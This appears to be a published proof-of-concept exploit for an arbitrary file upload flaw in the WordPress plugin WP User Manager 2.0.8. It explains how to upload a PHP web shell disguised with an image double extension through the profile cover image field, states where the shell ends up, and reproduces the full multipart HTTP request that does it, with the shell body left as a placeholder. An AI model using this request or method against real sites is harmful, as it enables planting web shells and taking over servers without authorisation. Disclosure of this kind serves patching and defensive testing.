# Exploit Title: Wordpress Plugin WP User Manager 2.0.8 - Arbitrary file upload
# Exploit Author: Mr Winst0n
# Author E-mail: manamtabeshekan[@]gmail[.]com
# Discovery Date: February 5, 2019
# Vendor Homepage: https://wpusermanager.com
# Software Link : https://wordpress.org/plugins/wp-user-manager/
# Tested Version: 2.0.8
# Tested on: Kali linux, Windows 8.1 / Wordpress 4.9.8

# Note: Free edition is vulnerable, other versions may also be affected.

# PoC:
# 1.- Login to site and go to your profile setting
# 2.- In profile cover image section, you can upload your shell by adding image extensions to end of your shell. (ex: SHELL.php.png)
# 3.- Click on "Update Profile"
# You can see your shell in /wp-content/uploads/wp-user-manager-uploads/[year]/[month]/SHELL.php.png 


# PoC header:

POST /wordpress/?page_id=214&updated=success HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:60.0) Gecko/20100101 Firefox/60.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://localhost/wordpress/?page_id=214&updated=success
Content-Type: multipart/form-data; boundary=---------------------------1794372498243154061698264842
Content-Length: 2142
Cookie: wordpress_logged_in_bbfa5b726c6b7a9cf3cda9370be3ee91=root%7C1547649639%7CwJOz9suousR6JF7I0vqY76uoTRfAwA7bE0diqvzfxjP%7C8fbaaff802e0459d5aa4a1f581eb78053d63c4d024ef4d6048eb7c7c952b8ff5; wp-settings-1=libraryContent%3Dbrowse%26editor%3Dhtml%26post_dfw%3Doff; wp-settings-time-1=1547476851
Connection: close
Upgrade-Insecure-Requests: 1

-----------------------------1794372498243154061698264842
Content-Disposition: form-data; name="user_cover"; filename="SHELL.php.jpeg"
Content-Type: image/jpeg

{{"SHELL CONTENT"}}

-----------------------------1794372498243154061698264842
Content-Disposition: form-data; name="user_email"

{{"Email"}}
-----------------------------1794372498243154061698264842
Content-Disposition: form-data; name="user_firstname"


-----------------------------1794372498243154061698264842
Content-Disposition: form-data; name="user_lastname"


-----------------------------1794372498243154061698264842
Content-Disposition: form-data; name="user_nickname"

root
-----------------------------1794372498243154061698264842
Content-Disposition: form-data; name="user_displayname"

display_nickname
-----------------------------1794372498243154061698264842
Content-Disposition: form-data; name="user_website"


-----------------------------1794372498243154061698264842
Content-Disposition: form-data; name="user_description"


-----------------------------1794372498243154061698264842
Content-Disposition: form-data; name="wpum_form"

profile
-----------------------------1794372498243154061698264842
Content-Disposition: form-data; name="step"

0
-----------------------------1794372498243154061698264842
Content-Disposition: form-data; name="account_update_nonce"

df63baa04c
-----------------------------1794372498243154061698264842
Content-Disposition: form-data; name="_wp_http_referer"

/wordpress/?page_id=214&updated=success
-----------------------------1794372498243154061698264842
Content-Disposition: form-data; name="submit_account"

Update profile
-----------------------------1794372498243154061698264842--